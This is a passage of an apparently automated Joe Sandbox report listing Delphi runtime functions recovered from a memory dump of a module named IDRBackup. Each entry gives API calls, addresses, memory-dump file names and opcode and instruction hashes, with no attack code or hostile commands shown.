                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2718466752-0
                                                                                                  • Opcode ID: d3472ce51e1e4d7c43096c6d1dc8011218f4b6f0d31894a17688fc7172dd10f5
                                                                                                  • Instruction ID: b90fdfa914548ce8d05a9719d69e5cbf12a9b698905def4a3bb0f427dd695afc
                                                                                                  • Opcode Fuzzy Hash: d3472ce51e1e4d7c43096c6d1dc8011218f4b6f0d31894a17688fc7172dd10f5
                                                                                                  • Instruction Fuzzy Hash: 32316130A00289ABDF11DFA4EC916AEB7F5EF54300F5046A6E980D7255E7B0DE81CBD5
                                                                                                  Function 50016B4C Relevance: 13.6, APIs: 9, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B7D
                                                                                                    • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B89
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BAE
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BBA
                                                                                                    • Part of subcall function 5000A1E4: @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                    • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                    • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                    • Part of subcall function 5000A1E4: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BDF
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BEB
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C06
                                                                                                    • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$Stringx20$Asg$qqrr20Cat3$qqrr20StringStringt2$FromStr$qqriSysutils@$CharLen$qqrr20Move$qqrpxvpvi$Char$qqrr20Clr$qqrpvString$qqriStringbStringpbiStringpci
                                                                                                  • String ID:
                                                                                                  • API String ID: 2917779735-0
                                                                                                  • Opcode ID: 0163770234b153fc603f73859ed527ed7eb92f76623291e36795d766039d6016
                                                                                                  • Instruction ID: 76f8e76b563a54bc19a49a39c681c756d7ccbd9bc0e3cb43033c5cd06b9a2793
                                                                                                  • Opcode Fuzzy Hash: 0163770234b153fc603f73859ed527ed7eb92f76623291e36795d766039d6016
                                                                                                  • Instruction Fuzzy Hash: 2A2192707051545BE708CA9DDC659AAB3EBEFE9300F94C62BB549C3344DEB8AD118690
                                                                                                  Function 5002D62C Relevance: 13.6, APIs: 9, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D679
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D674
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D69C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6A1
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D71E), ref: 5002D6BE
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6ED
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$RaiseRecxiSysutils@Unicode$Except$qqrvException@$bctr$qqrp20Recpx14$AnsiAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20FromInternalList$qqrvLoadMetaStr$qqrr20String$qqrp20Stringpx14Stringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 211832472-0
                                                                                                  • Opcode ID: d82c6879fd7e8bb308ec514bab1eca5c326ff1012e43fe8cdcdfe95a8be795b9
                                                                                                  • Instruction ID: baf3d6f3658cd3b0b0bf9b1fe87a80f42db4b7494a16350bdacbce027700de45
                                                                                                  • Opcode Fuzzy Hash: d82c6879fd7e8bb308ec514bab1eca5c326ff1012e43fe8cdcdfe95a8be795b9
                                                                                                  • Instruction Fuzzy Hash: 3E319530A05589AFEB10DFE8E995A9DB7F8EF54304F5081A7E904D7261DB709E05CB90
                                                                                                  Function 5001C198 Relevance: 13.6, APIs: 9, Instructions: 77fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1B9
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1BF
                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1D5
                                                                                                  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 5001C1E9
                                                                                                  • ImageDirectoryEntryToData.IMAGEHLP(?,00000000,0000000E,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C212
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000), ref: 5001C21B
                                                                                                  • UnmapViewOfFile.KERNEL32(?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 5001C23D
                                                                                                  • CloseHandle.KERNEL32(?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C246
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002), ref: 5001C24F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleSystem@@View$Char$qqrx20DataDirectoryEntryExit$qqrvFinallyImageMappingStringSystem@UnicodeUnmap
                                                                                                  • String ID:
                                                                                                  • API String ID: 2267264102-0
                                                                                                  • Opcode ID: 57813ce33fd1e787f2ae7afc3594a276316039dc248eaabb460c0ce63afaddb7
                                                                                                  • Instruction ID: ed93af7bb64c484572da9e927bec8c4042e6e931a3020e493e924e2f8d9bdac0
                                                                                                  • Opcode Fuzzy Hash: 57813ce33fd1e787f2ae7afc3594a276316039dc248eaabb460c0ce63afaddb7
                                                                                                  • Instruction Fuzzy Hash: C321A1B0A443C47BFB10CAE4AC56FAEB7BCAB18700F500655F704FB1C1D6B5A9408795
                                                                                                  Function 5002DB48 Relevance: 13.6, APIs: 9, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,00000000,?), ref: 5002DB70
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,00000000,?), ref: 5002DB75
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DB98
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DB9D
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBC0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBC5
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,00000000,?), ref: 5002DBCC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBF1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBF6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseString$Except$qqrvException@$bctr$qqrp20Sysutils@$Recpx14Recxi$AfterArrayClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucLength$qqrvList$qqrvLoadMetaObjectString$qqrp20
                                                                                                  • String ID:
                                                                                                  • API String ID: 434768823-0
                                                                                                  • Opcode ID: 70035ba3cdc4d1b591e6ff713689efda533d35203e273b787accabacad4fdffb
                                                                                                  • Instruction ID: 10693105d4530467d70705bbd3336f9fa5ff1ffcd69f97b7e410178babc29af3
                                                                                                  • Opcode Fuzzy Hash: 70035ba3cdc4d1b591e6ff713689efda533d35203e273b787accabacad4fdffb
                                                                                                  • Instruction Fuzzy Hash: 8E219531E06685ABEB10DFD9FCD1BADB7B8AB54304F50816AF90497352CB715D058BA0
                                                                                                  Function 500119D8 Relevance: 13.6, APIs: 9, Instructions: 67threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011A8B), ref: 50011A03
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50011A8B), ref: 50011A08
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011A8B), ref: 50011A27
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011A8B), ref: 50011A51
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011A8B), ref: 50011A5B
                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A67
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3094671988-0
                                                                                                  • Opcode ID: 61edf3dfb67e96cd3ce6b600e90b04d6ddfba1988f50e1faa7fba45ec40b8dee
                                                                                                  • Instruction ID: 64e016724a4648d9eccdf5b5c7b5b498823f636818398dbbc543729642361fab
                                                                                                  • Opcode Fuzzy Hash: 61edf3dfb67e96cd3ce6b600e90b04d6ddfba1988f50e1faa7fba45ec40b8dee
                                                                                                  • Instruction Fuzzy Hash: 01118770A01285AFEF05DFF9DC9199EBBF8EF49210B9446A6F940E3311D730AE40DA91
                                                                                                  Function 50011AAC Relevance: 13.6, APIs: 9, Instructions: 67threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011B5F), ref: 50011AD7
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50011B5F), ref: 50011ADC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011B5F), ref: 50011AFB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011B5F), ref: 50011B25
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011B5F), ref: 50011B2F
                                                                                                  • LCMapStringW.KERNEL32(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B3B
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3094671988-0
                                                                                                  • Opcode ID: bb35b1ec3dee52f85de0abe14dd36a5b07772a894f879ccd0841f78612b6cb55
                                                                                                  • Instruction ID: aa116bdb757719b18d0b9449cf26451f3ca687c3b180189956f3d9f0d1195bcc
                                                                                                  • Opcode Fuzzy Hash: bb35b1ec3dee52f85de0abe14dd36a5b07772a894f879ccd0841f78612b6cb55
                                                                                                  • Instruction Fuzzy Hash: 64118470A05285AFEF04DFA9DDD299EB7F8EF59210B5442A6F900E3311E730AE40DA91
                                                                                                  Function 5002F388 Relevance: 13.6, APIs: 9, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3B8
                                                                                                  • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CA
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CF
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3DE
                                                                                                  • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F5
                                                                                                  • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F407
                                                                                                    • Part of subcall function 5002F438: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                    • Part of subcall function 5002F438: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                    • Part of subcall function 5002F438: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                    • Part of subcall function 5002F438: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                    • Part of subcall function 5002F438: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F40C
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$Unicode$System@@$Raise$ArrayError@$bctr$qqrlx20Except$qqrvLoadSafeString$qqrp20Varutils@$Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Error$qqrucException@$bctr$qqrx20Format$qqrx20List$qqrvMetaRecxiStringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2318074137-0
                                                                                                  • Opcode ID: 2fc197e72b512a73204bf5c851bd90a70b0a5406eff194070ecd408d08181925
                                                                                                  • Instruction ID: bc5804b8ea2ea52ee02b52fff60dedcdbde60d4b00371caa1661321ee3d8b552
                                                                                                  • Opcode Fuzzy Hash: 2fc197e72b512a73204bf5c851bd90a70b0a5406eff194070ecd408d08181925
                                                                                                  • Instruction Fuzzy Hash: F81108316021C25BE720EFA8FCA3A7FB3E9EB58240FA00276F504C3252C6B16D018761
                                                                                                  Function 5000D428 Relevance: 13.6, APIs: 9, Instructions: 55stringCOMMON
